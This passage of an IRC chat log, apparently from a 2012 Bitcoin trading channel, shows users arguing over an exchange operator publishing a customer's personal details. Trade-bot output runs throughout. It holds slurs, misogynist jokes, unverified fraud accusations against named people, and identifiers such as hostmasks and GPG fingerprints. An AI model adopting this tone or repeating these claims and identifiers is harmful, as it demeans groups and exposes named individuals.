01:11:02 he'll be in jail. Sep 20 01:11:05 BTC-Mining: sure, disclosing in private to justifiably interested parties is fine. Your shareholders/creditors should definitely be able to find out if any funny business happens Sep 20 01:11:24 The "I'm 15" post was sarcastic. Sep 20 01:11:31 @usagi Sep 20 01:11:42 BTC-Mining: but it's shady as hell to release your customers' information without a court order. Note how MagicalTux refuses to give any information without a police report Sep 20 01:11:54 BTC-Mining: take casascius on the other hand, releasing pirateat40's home address Sep 20 01:11:58 Tux = good Sep 20 01:11:59 copumpkin more to the point : it's illegal. Sep 20 01:12:03 Casascius = bad Sep 20 01:12:23 Yes, but unlike MtGox, the info you give GLBSE, you give permission for those info to be disclosed publicly. Sep 20 01:12:29 doesn't make a difference. Sep 20 01:12:46 BTC-Mining: they can write "you sign away your firstborn" on that EULA, but it isn't actually valid Sep 20 01:12:56 let me explain this for the benefit of those who have no ideea how the law works. Sep 20 01:13:10 woman shows up at police complains she's being stalked. Sep 20 01:13:17 As far as I know, agreeing to disclose your private information is perfectly valid, however. Sep 20 01:13:24 asked where stalker might have gotten her identity, she lists nefario's glbse. Sep 20 01:13:40 the da in her country sends a comity request to the brits, Sep 20 01:13:50 and next he shows up at the airport in the uk nefario is kindly asked to show up to the da. Sep 20 01:13:58 You are a doctor nefario? Sep 20 01:14:00 they discover he's done this, he gets prosecuted. Sep 20 01:14:11 wow wtf Sep 20 01:14:16 nefario is retarded Sep 20 01:14:24 get your shit out of glbse statte Sep 20 01:14:58 publishing customer info? Sep 20 01:15:02 thats illegal bro Sep 20 01:15:20 in any civilised juristiction anyway Sep 20 01:15:28 depends on jurisdiction Sep 20 01:15:34 in the EU you're bound by the data protection laws Sep 20 01:15:47 nefario weren't you claiming to live in the uk when i said you lived in china ? Sep 20 01:15:48 cannot collect or keep data on a person except for the purposes they agree to Sep 20 01:16:17 I'm not involved in the hasking thing at all Sep 20 01:16:28 and if he's really 15 Sep 20 01:16:32 lol Sep 20 01:16:32 then nothing will come of it Sep 20 01:16:34 IMO Sep 20 01:17:58 so Sep 20 01:18:03 good evening Sep 20 01:18:03 italian police is getting involived or what Sep 20 01:18:11 what the hell happened? Sep 20 01:18:13 should be Sep 20 01:18:27 if I was bitscalper I would have reported it to them Sep 20 01:18:37 and the UK police or wherever nefario is Sep 20 01:18:49 if its china, don't bother Sep 20 01:21:03 dub: what laws would you like to try to prosecute me under? Sep 20 01:21:16 im sure there are privacy laws in the uk Sep 20 01:21:33 there is data protection act 2008 Sep 20 01:21:49 you should read it Sep 20 01:21:55 it's not too difficult Sep 20 01:22:12 also there are plenty of explanations online if you don't get it Sep 20 01:22:29 sorry Sep 20 01:22:35 it's 1998 data protection act Sep 20 01:22:41 bound to be the same as the equivalent here, which makes it illegal to disclose shit to 3rd parties without court order Sep 20 01:23:08 I don't know about UK, but here in Canada, I'm almost sure you can agree to get your personal data published and it's perfectly valid as long as you agreed to it. Sep 20 01:23:42 It's only illegal if you gave it so the service can identify you, and they then publish it without your consent. Sep 20 01:23:58 Which is not why you gave the information. In that case it would require a court order. Sep 20 01:24:10 so nefario blame them because they published the id of alberto on the forum? Sep 20 01:24:18 am i right? Sep 20 01:24:27 blame who? Sep 20 01:24:38 nefario published Alberto's info. Sep 20 01:24:39 nefario published it Sep 20 01:24:41 ah sorry Sep 20 01:24:46 ok ok Sep 20 01:24:47 Others are complaining about that. Sep 20 01:24:47 sorry Sep 20 01:26:06 BTC-Mining: others are complaining about what? Sep 20 01:26:23 Well that you published private info? Sep 20 01:26:47 But nefario, you should probably consult a lawyer and get a form for people to sign when they give GLBSE identification documents. Sep 20 01:26:48 actually the only complaint seems to be that we're pushing for prosecution Sep 20 01:27:00 BTC-Mining: I'm pretty sure it's not illegal in many cases, and it's somewhat different per-province/territory. Sep 20 01:27:02 not about releasing info Sep 20 01:27:32 I'm talking about people on this chat complaining, not on the thread Sep 20 01:27:56 there's dub and mircea, so no one important Sep 20 01:28:22 BTC-Mining: In any case, here's a helpful datasheet: http://www.priv.gc.ca/information/02_05_d_08_e.asp Sep 20 01:29:38 not important like nefarios crew Sep 20 01:29:44 interscamgo et al Sep 20 01:29:59 the furture of bitcoin Sep 20 01:30:07 what the hell ? Sep 20 01:30:38 BTC-Mining: In the absolute worst case, and in the event the Privacy Commissioner of Canada agrees with your case, you take it to court, potentially get damages awarded, and can have the court order the business to change the way it handles privacy information. But it's certainly not a criminal punishment for bad behaviour.. Sep 20 01:31:11 For that I'd agree... Sep 20 01:31:27 .ticker asicminer Sep 20 01:31:36 no. Sep 20 01:31:37 BTC-Mining: Also, it applies only to organizations engaged in commercial activities. I think private individuals acting are NOT covered. Sep 20 01:31:38 !ticker asicminer Sep 20 01:31:40 [GLBSE:ASICMINER] [Bid: 0.1127] [Ask: 0.1132] [Spread: 0.0005] [Last: 0.115] [24hVol: 371.99231947] [7dAvg: 0.11296469] Sep 20 01:31:55 oh and mircea, nefario, quit it already. You both manage an important trading platform. Sep 20 01:32:08 BTC-Mining no, we don't bioth anything Sep 20 01:32:20 he's managing an appaling trainwreck which is a putrid stain on the reputation of bitcoin Sep 20 01:32:29 and he associates with some putrid stains on the reputation of bitcoin Sep 20 01:32:33 and he lies about it now. Sep 20 01:32:36 so, no. Sep 20 01:32:48 [GLBSE] [ASICMINER] 5 @ 0.1127 = 0.5635 BTC [-] Sep 20 01:32:48 [GLBSE] [ASICMINER] 12 @ 0.1125 = 1.35 BTC [-] Sep 20 01:32:50 [GLBSE] [ASICMINER] 1 @ 0.1112 BTC [-] Sep 20 01:32:51 [GLBSE] [ASICMINER] 36 @ 0.1111 = 3.9996 BTC [-] Sep 20 01:32:52 [GLBSE] [ASICMINER] 20 @ 0.111 = 2.22 BTC [-] Sep 20 01:32:53 [GLBSE] [ASICMINER] 15 @ 0.11000001 = 1.65 BTC [-] Sep 20 01:32:55 [GLBSE] [ASICMINER] 72 @ 0.11 = 7.92 BTC [-] Sep 20 01:32:56 [GLBSE] [ASICMINER] 70 @ 0.11 = 7.7 BTC [-] Sep 20 01:33:16 what can I say, mircea has more time to piss away on IRC than me, let him have this domain Sep 20 01:33:41 o, more popcorn fodder? Sep 20 01:33:53 the only reason i'm not routing you off the forum is cause the forum isn't worth the effort. Sep 20 01:34:04 if idiots like mathew wright can dick around there so can idiots like you. Sep 20 01:34:30 Who's kakobrekla >? Sep 20 01:34:39 me Sep 20 01:34:55 lol Sep 20 01:34:56 Yes, but do you operate something? You are listed as channel founder: what was the purpose of this channel meant to be? Sep 20 01:34:56 you're no one Sep 20 01:35:07 he runs assbot I think Sep 20 01:35:14 kakobrekla lol i admire you not booting the idiot at this point. i would have. Sep 20 01:35:26 nefario he owns the chanel. and you're 15. Sep 20 01:35:52 with mild alopecia Sep 20 01:36:08 what is the issue here Sep 20 01:36:19 :o Sep 20 01:36:22 with alopecia? Sep 20 01:36:37 [GLBSE] [PAJKA.BOND] 4 @ 0.081 = 0.324 BTC [-] Sep 20 01:36:39 no, just saying if I'm 15 then I've got a hair problem Sep 20 01:37:01 o.O Sep 20 01:37:20 [GLBSE] [PAJKA.BOND] 1 @ 0.0815 BTC [+] Sep 20 01:37:30 [MPEX] [F.GIGA.ETF] 5580 @ 0.000264 = 1.4731 BTC [-] Sep 20 01:37:32 [MPEX] [F.GIGA.ETF] 620 @ 0.00026371 = 0.1635 BTC [-] Sep 20 01:37:33 [MPEX] [S.MPOE] 6150 @ 0.00040681 = 2.5019 BTC [-] Sep 20 01:37:34 [MPEX] [S.MPOE] 14650 @ 0.00040555 = 5.9413 BTC [-] Sep 20 01:38:18 tits Sep 20 01:38:22 this is a free for all Sep 20 01:38:30 you can insult eachother as you please Sep 20 01:38:36 if you cant take it, leave Sep 20 01:38:44 im not going to ban anyone at this point Sep 20 01:38:47 thanks. Sep 20 01:39:09 admirable. Sep 20 01:40:15 come on man, race war. let's go! Sep 20 01:40:22 and Kako is right, in my opinion. Sep 20 01:40:25 usagi, extensive spaming for example Sep 20 01:40:36 repeating the same line over and over again Sep 20 01:40:37 [GLBSE] [YABMC] 1 @ 0.077 BTC [-] Sep 20 01:40:39 exactly the same. Sep 20 01:40:42 that would get you banned. Sep 20 01:40:51 *** PENIS PILLS **** WWW>PENIPILLS>COM Sep 20 01:41:09 i told you he's 15. Sep 20 01:41:22 better to let everyone shine in their true light Sep 20 01:41:30 if i ban someone, we will be short of that info Sep 20 01:42:12 jesus he's so close to my own philosophy i could try. Sep 20 01:42:15 i could cry* Sep 20 01:42:57 i would ban highlevelminer for example :) Sep 20 01:43:59 hm Sep 20 01:44:00 accually Sep 20 01:44:08 i had a wicked idea a few days ago Sep 20 01:44:11 if you want it Sep 20 01:44:15 i will implement it Sep 20 01:44:52 [GLBSE] [FDBF] 13 @ 0.14500003 = 1.885 BTC [+] Sep 20 01:44:53 [GLBSE] [FDBF] 7 @ 0.14500002 = 1.015 BTC [-] Sep 20 01:44:57 each person can cast a vote for other people to be kicked out of this room, if there is n votes in m, person gets a o minute ban Sep 20 01:45:07 in m minutes* Sep 20 01:45:18 kakobrekla: I am not appealing to you to act: I am curious to know the boundaries. I know them now. Thanks for clarifying. Heh heh.. Sep 20 01:45:57 like a self moderation thingy. Sep 20 01:46:06 [GLBSE] [ASICMINER] 25 @ 0.1099 = 2.7475 BTC [-] Sep 20 01:46:08 that is a really stupid. Sep 20 01:46:12 ideea. Sep 20 01:46:22 you feel you would fly out quickly eh Sep 20 01:46:53 What if you had to pay 1BTC per vote, to be distributed to the remaining people in the room? Sep 20 01:46:58 lol Sep 20 01:47:19 kakobrekla think of it this way : i have enough money to hire people to come post here to kick you out. Sep 20 01:47:53 in general the value comes from the outliers not from the center. this is why we have silicon valley : to support innovation, not conformity. Sep 20 01:48:10 fine Sep 20 01:48:12 so as an ideea it runs contrary to the very principle of pretty much everything, from bitcoin to freenode all the way to foss. Sep 20 01:48:13 you asked for moderation Sep 20 01:48:16 i gave you an option Sep 20 01:48:18 refused. Sep 20 01:48:24 we are done with this topic now, for good. Sep 20 01:48:34 democracy = mob rule Sep 20 01:48:47 pull your guns back out Sep 20 01:48:49 anarchy=...anarchy Sep 20 01:49:19 nefario anarchy is that system where some guy that's been running the market where scams gather for years doesn't get to play the respectable. Sep 20 01:49:25 yes, you're nto a whore yourself. you're the matron. Sep 20 01:49:49 smickles: indeed, no mob rule Sep 20 01:50:16 Enlightened absolutism all the way Sep 20 01:50:50 we just need an appeal to god, that's all Sep 20 01:51:00 for to give us Sep 20 01:51:02 watermelons! Sep 20 01:51:27 [GLBSE] [UDN] 3 @ 0.03498999 = 0.105 BTC [-] Sep 20 01:52:23 Hmm... I'd be all for watermelons Sep 20 01:52:24 wait, Sep 20 01:52:41 the movie version of the emperor caligulaQ!!! Sep 20 01:56:05 ;;bc,24hprc Sep 20 01:56:07 12.37 Sep 20 01:56:39 kakobrekla: they had that in #bitcoin a year ago, it got gamed Sep 20 01:56:50 longer than that maybe Sep 20 01:56:54 aha Sep 20 01:56:58 i was not aware of that Sep 20 01:57:03 it was neat Sep 20 01:57:35 if people said 'thanks dub' you got karma points, eventually you got voice, then you could !+b loser and if enough voices agreed they got banned Sep 20 01:57:53 o cute Sep 20 01:59:05 people Sep 20 01:59:42 Smoovious: or 100% are self serving Sep 20 01:59:48 but not a mix Sep 20 02:00:07 not exactly Sep 20 02:02:56 [GLBSE] [UDN] 3 @ 0.03498999 = 0.105 BTC [-] Sep 20 02:03:03 [MPEX] [S.MPOE] 36400 @ 0.00041085 = 14.9549 BTC [+] Sep 20 02:04:27 [GLBSE] [GSDPT] 1 @ 0.0034 BTC [+] Sep 20 02:07:46 [GLBSE] [FUTUREFUND] 1 @ 0.00012936 BTC [+] Sep 20 02:08:22 [GLBSE] [FUTUREFUND] 1 @ 0.00012936 BTC [+] Sep 20 02:11:14 nefario >> Alberto was also involved in another case of fraud, http://www.engadget.com/2010/04/09/ensos-zenpad-is-vaporware-get-refunds-while-they-last/ Sep 20 02:11:15 lol Sep 20 02:11:20 this was known for what, half a year? Sep 20 02:11:54 twas in the the first failed bdt thread Sep 20 02:11:55 oh well Sep 20 02:12:28 [GLBSE] [YARR] 1 @ 1.001 BTC [+] Sep 20 02:12:48 fuck this talk like a pirate day Sep 20 02:12:58 cant understand any of the fucking links in reddit Sep 20 02:13:20 avast! Sep 20 02:13:40 again with the pirate. Sep 20 02:13:48 arr Sep 20 02:13:51 aye Sep 20 02:14:10 is that dude still present on irc anyway Sep 20 02:14:34 holler be savin 'stow pillage nsfw Sep 20 02:14:47 ;;ident pirateat40 Sep 20 02:14:47 Nick 'pirateat40', with hostmask 'pirateat40!~pirateat4@unaffiliated/pirateat40', is not identified. Sep 20 02:14:56 not right now anyway Sep 20 02:15:24 yes he is, in #btcst Sep 20 02:16:03 [MPEX] [F.GIGA.ETF] 12200 @ 0.00027584 = 3.3652 BTC [+] Sep 20 02:16:05 /who pirateat40 Sep 20 02:16:10 /ns info pirateat40 Sep 20 02:16:15 /ison pirateat40 Sep 20 02:16:17 oh Sep 20 02:16:30 /me gives the keyboard a funny lool Sep 20 02:16:33 *look Sep 20 02:16:55 irc is hard Sep 20 02:17:28 my keyboard has buttons which, when pressed in a certain way make the IRC thing not do normal-like Sep 20 02:17:29 i thought pirate usually idented when he hopped on Sep 20 02:18:06 not lately Sep 20 02:18:16 yeah :/ Sep 20 02:18:30 probably too many "leave a message using gribble" hatemails Sep 20 02:18:58 ;;hate later Sep 20 02:18:58 Error: "hate" is not a valid command. Sep 20 02:19:06 ;;later hate Sep 20 02:19:07 Error: The "Later" plugin is loaded, but there is no command named "hate" in it. Try "list Later" to see the commands in the "Later" plugin. Sep 20 02:19:15 gribs is an innocent. Sep 20 02:19:16 ah Sep 20 02:19:25 ;;ident mircea_popescu Sep 20 02:19:26 Nick 'mircea_popescu', with hostmask 'mircea_popescu!~Mircea@trilema/mircea-popescu', is not identified. Sep 20 02:19:30 :o Sep 20 02:19:35 scammer Sep 20 02:19:35 want me to ident ? Sep 20 02:19:46 ;;ident Sep 20 02:19:46 You are identified as user smickles, with GPG key id EA62D7CEB2450C3F, key fingerprint 96ACCA7C3B09EC61B0A6D7F9EA62D7CEB2450C3F, and bitcoin address 12NjnZTVeTJ3g5C7BqfS2aQ2rLkmwiqVz6 Sep 20 02:19:52 mwahaha Sep 20 02:20:06 ;;echo No, YOU are identified as user smickles Sep 20 02:20:07 No, YOU are identified as user smickles Sep 20 02:20:11 ;;ident kakobrekla Sep 20 02:20:12 Nick 'kakobrekla', with hostmask 'kakobrekla!~T42@89-212-41-49.static.t-2.net', is not identified. Sep 20 02:20:24 ;;ident Sep 20 02:20:24 You are not identified. Sep 20 02:20:27 scamed by the chanop Sep 20 02:20:29 pft Sep 20 02:20:30 ;;ident Sep 20 02:20:31 You are not identified. Sep 20 02:20:32 ;;ident Sep 20 02:20:33 You are identified as user kakobrekla, with GPG key id 27AF75321F2489E8, key fingerprint 27C3CE9A20851312F086268C27AF75321F2489E8, and bitcoin address None Sep 20 02:20:40 uh ?! Sep 20 02:22:19 ;;echo I like cheese Sep 20 02:22:19 I like cheese Sep 20 02:22:23 i keep reading the channel mode as +cunt Sep 20 02:22:42 want sum ? get sum! Sep 20 02:22:45 .py print ';;ident' Sep 20 02:22:47 ;;ident Sep 20 02:22:47 You are not identified. Sep 20 02:22:48 ;;later tell kuzetsa not when its in your vagina Sep 20 02:22:49 The operation succeeded. Sep 20 02:23:21 the hell Sep 20 02:23:29 please don't talk about my anatomy Sep 20 02:23:31 lol Sep 20 02:23:47 https://bitcointalk.org/index.php?topic=110709.0;topicseen Sep 20 02:23:49 sif you have a vagoo Sep 20 02:24:12 that looks shooped Sep 20 02:24:24 I can tell because of pixels and nefario is a scammer Sep 20 02:25:16 ahaha smickles haxx Sep 20 02:26:03 mircea_popescu: one day, markac will ident as me Sep 20 02:26:18 ;;ud markac Sep 20 02:26:19 http://www.urbandictionary.com/products.php?term=Markac&defid=5962291 | ... with your own definition! by pseudonym129874. Definition: A slang term for anal masturbation. Example: That cucumber is perfect for some Markac action ... Sep 20 02:26:35 nowai ?! Sep 20 02:26:51 im sure vrag uses eggplants anyway. Sep 20 02:28:04 i just need to wait till markac goes offline, and renick and ,,ident Sep 20 02:28:38 good to see chief bitcoin scammer theymos is weighing in on nefarios crime Sep 20 02:29:29 cabal wagons circling Sep 20 02:30:22 eh ?! Sep 20 02:30:39 smickles you know it hasn't been offline in weeks ? maybe months. Sep 20 02:31:07 good job on violatign this individuals rights nefario, let me get you a fresh gerbil Sep 20 02:31:27 dub: where is that? Sep 20 02:31:49 https://bitcointalk.org/index.php?topic=93445.msg1205280#msg1205280 Sep 20 02:32:28 eh the post doesn't say that Sep 20 02:34:48 >Alberto agreed to this information being published, in the event of him scamming or running with the money, on sending it to me, I wouldn't post it otherwise. Sep 20 02:34:52 just for a piece of mind Sep 20 02:35:00 can we see that document signed or something Sep 20 02:35:08 peace. Sep 20 02:35:14 ya Sep 20 02:35:15 peace Sep 20 02:35:17 or where Sep 20 02:35:21 dd he agree to Sep 20 02:35:24 did* Sep 20 02:35:26 kakobrekla: with me, it was a conversation, not a document Sep 20 02:35:45 [GLBSE] [YABMC] 3 @ 0.077 = 0.231 BTC [-] Sep 20 02:35:48 the peace would reside in some piece of mind presumably Sep 20 02:35:51 you are nef pr now Sep 20 02:36:03 me? Sep 20 02:36:10 yes Sep 20 02:36:24 free btc for EVERYONE~ Sep 20 02:36:32 lol Sep 20 02:36:41 meh Sep 20 02:36:51 you guys are hopeless Sep 20 02:36:54 this was confusing Sep 20 02:37:15 its not really, you guys are just late to the party Sep 20 02:37:21 i still didnt get my answer Sep 20 02:37:30 nefario is just loling Sep 20 02:37:31 the answer is nefario is not to be trusted Sep 20 02:37:40 sorry kakobrekla, i just meant to say, that nef has my personal details, and there was no document signed about the terms of public release Sep 20 02:37:52 ahh Sep 20 02:37:52 he appears to be part of a UK based conspiracy to defraud the entire bitcoin community Sep 20 02:38:00 sorry smickles Sep 20 02:38:10 thought you were answering as him Sep 20 02:38:11 dub: just HOW thick IS your tinfoil hat Sep 20 02:38:25 smickles I spoke with on the phone Sep 20 02:38:30 asked him on there Sep 20 02:38:41 Alberto was over email Sep 20 02:38:48 [GLBSE] [JTME] 4 @ 0.74897879 = 2.9959 BTC [+] Sep 20 02:38:49 well nefario, just for your protection, it would help you to have a doc signed about releasing that sort of info Sep 20 02:38:49 [GLBSE] [JTME] 9 @ 0.7489788 = 6.7408 BTC [+] Sep 20 02:38:50 [GLBSE] [JTME] 2 @ 0.74999 = 1.5 BTC [+] Sep 20 02:38:51 [GLBSE] [JTME] 4 @ 0.755 = 3.02 BTC [+] Sep 20 02:38:53 [GLBSE] [JTME] 2 @ 0.77 = 1.54 BTC [+] Sep 20 02:38:56 can save you some trouble you know Sep 20 02:39:10 yeah I figure as much Sep 20 02:39:11 nefario: that's what i'm saying, it was a conversation Sep 20 02:39:22 yeah Sep 20 02:39:43 like I said I don't just go throwing peoples info about willy nilly Sep 20 02:40:01 nefario, get a lawyer to make a valid form to sign regarding this, and send it my way. Sep 20 02:40:02 noone argues alby is innocent Sep 20 02:40:16 well, no-one except himself, i guess. Sep 20 02:40:20 BTC-Mining: sure Sep 20 02:40:49 but to be honest, that entire thing smells bad. it seems more as an attempt for jro/kludge and possibly meni to extract themselves smelling rosy Sep 20 02:40:55 than anything. Sep 20 02:40:56 we'll have to include this in the TOS for asset issuers Sep 20 02:41:22 kluge is rosy Sep 20 02:41:30 the guy is paying with his own money Sep 20 02:41:41 maybe. Sep 20 02:41:55 no moonlanding malaimo Sep 20 02:41:55 he is Sep 20 02:41:56 eh Sep 20 02:41:59 mircea_popescu Sep 20 02:42:12 lasers Sep 20 02:42:15 hm ? Sep 20 02:43:02 you can use lasers to verify there are man made objects on the moon Sep 20 02:43:03 [MPEX] [S.MPOE] 2524 @ 0.00041187 = 1.0396 BTC [+] Sep 20 02:43:04 [MPEX] [S.MPOE] 17276 @ 0.00041296 = 7.1343 BTC [+] Sep 20 02:43:14 shhh nefario Sep 20 02:43:24 oh sorry Sep 20 02:43:43 Eh THEREWERE NOLANDINGSONZEMOOON Sep 20 02:44:37 mkay. Sep 20 02:47:06 can't you also get time at a nice telescope and see the footprints? Sep 20 02:47:51 at any rate it doesn't cunt till someone has sex on the moon. Sep 20 02:47:55 iirc, that one on that clif in s. california does it from time to time Sep 20 02:47:58 how do you know it's not a photo on the other end of the lens? Sep 20 02:48:35 nef have a friendlook at the lense when you look thru it, maybe Sep 20 02:48:47 how can you trust the fiend? Sep 20 02:48:53 what if it's like the truman show Sep 20 02:48:58 and they're in on the whole thing Sep 20 02:49:08 how do you know you are YOU? Sep 20 02:49:19 etc. Sep 20 02:49:34 I've got so much tinfoil on my head right now Sep 20 02:49:41 nefario: well answer me this: have you verified that the earth is a sphereoid? Sep 20 02:49:42 I can't even go near a microwave or mobile phone Sep 20 02:49:52 i have Sep 20 02:49:56 [GLBSE] [OBSI.HRPT] 2 @ 0.10274999 = 0.2055 BTC [-] Sep 20 02:50:01 it was a fun project Sep 20 02:50:12 it's a pity nefario doesn't have much time to waste on irc. Sep 20 02:50:47 i also mesured the circumfrence of the earth :) Sep 20 02:52:02 with a spork Sep 20 02:52:55 i wonder which model is better at predicting reality. the one where we faked the moonlanding, or the one where we whent there Sep 20 02:53:42 who cares whether we actually did it or not Sep 20 02:53:43 http://avalon-asic.com/ Sep 20 02:53:45 moar asics. Sep 20 02:53:52 old Sep 20 02:54:09 /a Sep 20 02:54:19 its chingchong. Sep 20 02:54:23 i mean ngz Sep 20 02:54:36 [GLBSE] [GIGAMINING] 1 @ 0.6499999 BTC [-] Sep 20 02:55:14 [GLBSE] [ASICMINER] 11 @ 0.1099 = 1.2089 BTC [-] Sep 20 02:55:29 if he doesnt get 300 orders Sep 20 02:55:31 i think it's ngz ya Sep 20 02:55:32 it aint happenin Sep 20 02:55:59 40k or w/e doesn't seem too far fetched. Sep 20 02:58:44 https://bitcointalk.org/index.php?topic=109349.msg1205428#msg1205428 this is pretty rich. Sep 20 02:58:49 apparently bfl ceo plead guilty. Sep 20 02:59:54 [GLBSE] [BTC-MINING] 2 @ 0.9799 = 1.9598 BTC [-] Sep 20 03:00:10 [GLBSE] [GIGAMINING] 1 @ 0.63520003 BTC [-] Sep 20 03:03:48 [GLBSE] [KRAKEN] 107 @ 0.00999996 = 1.07 BTC [+] Sep 20 03:04:00 and it all spirals out of control Sep 20 03:06:55 [GLBSE] [SYNERGY] 4 @ 0.1619998 = 0.648 BTC [+] Sep 20 03:09:03 [MPEX] [S.MPOE] 4600 @ 0.00041086 = 1.89 BTC [-] Sep 20 03:09:13 [GLBSE] [PAJKA.BOND] 3 @ 0.0815 = 0.2445 BTC [+] Sep 20 03:09:27 [GLBSE] [BTC-MINING] 6 @ 0.9799 = 5.8794 BTC [-] Sep 20 03:10:18 [GLBSE] [FZB.A] 87 @ 0.032 = 2.784 BTC [-] Sep 20 03:10:39 [GLBSE] [BTC-MINING] 7 @ 0.96 = 6.72 BTC [-] Sep 20 03:11:18 [GLBSE] [BTC-BOND] 19 @ 0.01 = 0.19 BTC [+] Sep 20 03:12:36 [GLBSE] [ASICMINER] 2 @ 0.109 = 0.218 BTC [-] Sep 20 03:12:38 [GLBSE] [ASICMINER] 30 @ 0.109 = 3.27 BTC [-] Sep 20 03:12:39 [GLBSE] [ASICMINER] 18 @ 0.109 = 1.962 BTC [-] Sep 20 03:13:40 [GLBSE] [GIGAMINING] 1 @ 0.65 BTC [+] Sep 20 03:13:49 [GLBSE] [OBSI.HRPT] 11 @ 0.10101001 = 1.1111 BTC [-] Sep 20 03:13:51 [GLBSE] [OBSI.HRPT] 4 @ 0.10101 = 0.404 BTC [-] Sep 20 03:13:52 [GLBSE] [OBSI.HRPT] 2 @ 0.101005 = 0.202 BTC [-] Sep 20 03:13:54 [GLBSE] [OBSI.HRPT] 35 @ 0.101 = 3.535 BTC [-] Sep 20 03:13:55 [GLBSE] [OBSI.HRPT] 15 @ 0.1001 = 1.5015 BTC [-] Sep 20 03:13:55 [GLBSE] [OBSI.HRPT] 14 @ 0.10000001 = 1.4 BTC [-] Sep 20 03:13:56 [GLBSE] [OBSI.HRPT] 50 @ 0.1 = 5 BTC [-] Sep 20 03:13:58 [GLBSE] [OBSI.HRPT] 19 @ 0.1 = 1.9 BTC [-] Sep 20 03:14:19 Well I guess that will send ASIC stocks price crashing? Sep 20 03:14:33 All mining crashes Sep 20 03:14:53 EVERYTHING CRASHES Sep 20 03:14:58 [GLBSE] [GIGAMINING] 1 @ 0.66999999 BTC [+] Sep 20 03:14:59 WAAAAAAAAAAAAAAAHAHAHAHAHAHAHA Sep 20 03:16:50 [GLBSE] [OBSI.HRPT] 12 @ 0.10000001 = 1.2 BTC [+] Sep 20 03:16:51 [GLBSE] [OBSI.HRPT] 6 @ 0.1 = 0.6 BTC [-] Sep 20 03:16:53 [GLBSE] [OBSI.HRPT] 4 @ 0.1 = 0.4 BTC [-] Sep 20 03:16:54 [GLBSE] [OBSI.HRPT] 99 @ 0.09995 = 9.8951 BTC [-] Sep 20 03:17:23 [GLBSE] [GIGAMINING] 5 @ 0.67 = 3.35 BTC [+] Sep 20 03:19:38 [GLBSE] [GIGAMINING] 11 @ 0.67 = 7.37 BTC [+] Sep 20 03:19:39 [GLBSE] [PAJKA.BOND] 1 @ 0.08234 BTC [+] Sep 20 03:20:44 [GLBSE] [ASICMINER] 36 @ 0.1091 = 3.9276 BTC [+] Sep 20 03:20:46 [GLBSE] [ASICMINER] 82 @ 0.109 = 8.938 BTC [-] Sep 20 03:20:47 [GLBSE] [ASICMINER] 20 @ 0.1086 = 2.172 BTC [-] Sep 20 03:20:48 [GLBSE] [ASICMINER] 20 @ 0.10851011 = 2.1702 BTC [-] Sep 20 03:20:50 [GLBSE] [ASICMINER] 35 @ 0.10851001 = 3.7979 BTC [-] Sep 20 03:20:51 [GLBSE] [ASICMINER] 200 @ 0.10851 = 21.702 BTC [-] Sep 20 03:20:51 [GLBSE] [ASICMINER] 9 @ 0.10850111 = 0.9765 BTC [-] Sep 20 03:21:09 [GLBSE] [YABIF] 2 @ 0.99 = 1.98 BTC [-] Sep 20 03:21:13 [GLBSE] [PAJKA.BOND] 5 @ 0.08235 = 0.4118 BTC [+] Sep 20 03:21:58 [GLBSE] [YABIF] 3 @ 0.9999 = 2.9997 BTC [+] Sep 20 03:22:23 [GLBSE] [SYNERGY] 4 @ 0.1619998 = 0.648 BTC [+] Sep 20 03:23:37 ;;rated smickles Sep 20 03:23:38 You rated user smickles on Sat Aug 25 08:39:34 2012, giving him a rating of 4, and supplied these additional notes: He's been running MPOE.ETF and releasing THE monthly reports, a model for all Bitcoin financial reporting. Also handled k's of BTC as broker for various clients.. Sep 20 03:24:09 ;;rated BTC-Mining Sep 20 03:24:10 You have not yet rated user BTC-Mining Sep 20 03:24:29 You have not yet rated user gribble Sep 20 03:24:41 ;;rate BTC-Mining 3 Delivered on contracts, longstanding trader. Sep 20 03:24:42 Error: User doesn't exist in the Rating or GPG databases. User must be GPG-registered to receive ratings. Sep 20 03:24:47 uhm Sep 20 03:24:50 ;;ident BTC-Mining Sep 20 03:24:51 Nick 'BTC-Mining', with hostmask 'BTC-Mining!~BTC-Minin@modemcable037.34-22-96.mc.videotron.ca', is identified as user Namjies, with GPG key id F2758D83EEEDE453, key fingerprint F12DE6B4E1EF26F5768BE918F2758D83EEEDE453, and bitcoin address None Sep 20 03:24:58 ;;rated Namjies Sep 20 03:24:59 You rated user Namjies on Fri Aug 10 19:39:27 2012, giving him a rating of 1, and supplied these additional notes: Did some design work for me.. Sep 20 03:25:06 ;;rate Namjies 3 Delivered on contracts, longstanding trader. Sep 20 03:25:08 Rating entry successful. Your rating for user Namjies has changed from 1 to 3. Sep 20 03:26:56 ;;rated reeses Sep 20 03:26:57 You have not yet rated user reeses Sep 20 03:27:01 ;;rate reeses 3 No homo. Sep 20 03:27:03 Rating entry successful. Your rating of 3 for user reeses has been recorded. Sep 20 03:27:20 ;;rate mircea_popescu 2 may be homo Sep 20 03:27:21 Rating entry successful. Your rating of 2 for user mircea_popescu has been recorded. Sep 20 03:27:25 j’k Sep 20 03:27:37 lol Sep 20 03:27:40 ;;rate mircea_popescu 3 Enthusiastic seeker of truth Sep 20 03:27:41 Rating entry successful. Your rating for user mircea_popescu has changed from 2 to 3. Sep 20 03:27:56 the butttruth can only come through butthurt Sep 20 03:28:51 ;;rate mircea_popescu 2 Good options provider. Ongoing asset lending contract. Sep 20 03:28:52 Rating entry successful. Your rating of 2 for user mircea_popescu has been recorded. Sep 20 03:29:06 [GLBSE] [SILVER] 5 @ 0.01 = 0.05 BTC [+] Sep 20 03:31:16 [GLBSE] [GMVT-BOT] 1 @ 0.12 BTC [-] Sep 20 03:33:55 [GLBSE] [ASICMINER] 1 @ 0.1132 BTC [+] Sep 20 03:35:01 [GLBSE] [FUTUREFUND] 35 @ 0.00012936 = 0.0045 BTC [+] Sep 20 03:35:18 [GLBSE] [ASICMINER] 1 @ 0.1132 BTC [+] Sep 20 03:38:02 [MPEX] [S.MPOE] 11306 @ 0.0004099 = 4.6343 BTC [-] Sep 20 03:38:20 [GLBSE] [NASTY] 1 @ 0.5199 BTC [+] Sep 20 03:44:33 Yoyoyoy Sep 20 03:44:35 what is up Sep 20 03:44:43 the party just started :D Sep 20 03:45:21 where da bitchez at ? Sep 20 03:45:41 In the kitchen Sep 20 03:45:45 where they should be Sep 20 03:45:58 /mysognist Sep 20 03:46:05 Bane_Capital: i think this is the news of the day https://bitcointalk.org/index.php?topic=93445.msg1205151#msg1205151 Sep 20 03:46:34 lol Sep 20 03:46:41 i'd say the bfl guy being ousted as ex-con fraudster is more newsworthy. Sep 20 03:46:41 they got him in his 